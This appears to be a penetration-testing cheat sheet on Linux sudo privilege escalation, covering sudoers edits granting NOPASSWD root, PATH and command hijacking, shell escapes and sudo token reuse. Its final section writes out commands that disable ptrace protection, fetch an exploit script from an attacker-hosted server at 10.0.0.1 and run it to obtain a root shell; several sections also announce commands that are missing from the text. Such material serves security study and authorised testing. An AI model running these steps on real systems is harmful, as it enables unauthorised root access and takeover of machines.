Sudo Privilege Escalation
Sudo commands might be vulnerable to privilege escalation (PrivEsc).
GTFOBins
GTFOBins provides a wide variety of payloads to privilege escalation.
So it's recommended to look for in there.
Investigation
Version
If the sudo version <=1.28, try the following command.
As Another Users
List Privileges Commands
We may be able to see the commands available as another user.
sudo -l
sudo -ll
# Specify hostname
sudo -h <host-name> -l
# Execute via the hostname
sudo -h <host-name> /bin/bash
Also we might see from following files.
If we find the following result for sudoers,
We might be able to get a root shell as follow.
Edit Sudoers
If we have permission to write /etc/sudoers, we can modify this file.
Now add the following line to allow us to execute all commands as root.
Assume we logged in as john.
# Unrestriction
john ALL=(ALL:ALL) ALL
# or
john ALL=(root) NOPASSWD: ALL
# Specific command as root
john ALL=(root) NOPASSWD: /usr/bin/passwd
Command Forgery (NOPASSWD)
If you are allowed to execute some command, you can forge the contents of the command.
First off, check the properties.
If you can confirm that it can be executed as root without password, create the same named command in the arbitrary folder in which you can write files.
Next, change the permission for allowing to execute it.
And add the path to the environment.
Now execute the command as root.
Command Forgery (SETENV, NOPASSWD)
If you found there is a SETENV: in sudoers, you can set the PATH when running the command.
As the previous section, prepare the payload.
Now run the command as root with setting the PATH.
Command Path Hijacking
sudo -l
env_reset
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
(root) python /home/user/example.py
If we can execute some command as root but env_reset and secure_path are set, we cannot override the PATH environment variable.
Instead we need to check if we have permission to write each path.
Assume we can write an arbitrary binary file under /usr/sbin, we can create a payload in there.
For example, we create a python binary under /usr/sbin.
Then execute the sudo command.
Now we should get a root shell.
Shell in Prompt
If we found there is another user’s script which can be executed as root, you can input `/bin/bash -i` to get a shell as another user.
Reuse Sudo Tokens
Reference: https://book.hacktricks.xyz/linux-hardening/privilege-escalation#reusing-sudo-tokens
If the current user executes some command using sudo, we might be able to escalate to root privilege. Check if no restriction on ptrace.
cat /proc/sys/kernel/yama/ptrace_scope
0
# We can temporariliy set 0 if we have permissions.
echo 0 | sudo tee /proc/sys/kernel/yama/ptrace_scope
If the target system does not have gdb binary, we can download it.
# In local machine, download the debian package.
wget http://fi.archive.ubuntu.com/ubuntu/pool/main/g/gdb/gdb_9.1-0ubuntu1_amd64.deb -O gdb.deb
python3 -m http.server
# In remote machine, download the deb package and extract it.
wget http://10.0.0.1:8000/gdb.deb
dpkg -x gdb.deb ~
Next, prepare the exploit script from the repo and execute it.
# In local machine, download the shell script to exploit.
wget https://github.com/nongiach/sudo_inject/blob/master/exploit.sh
python3 -m http.server
# In remote machine, download it and execute.
wget http://10.0.0.1:8000/exploit.sh
sh exploit.sh
After that, we can spawn the root shell.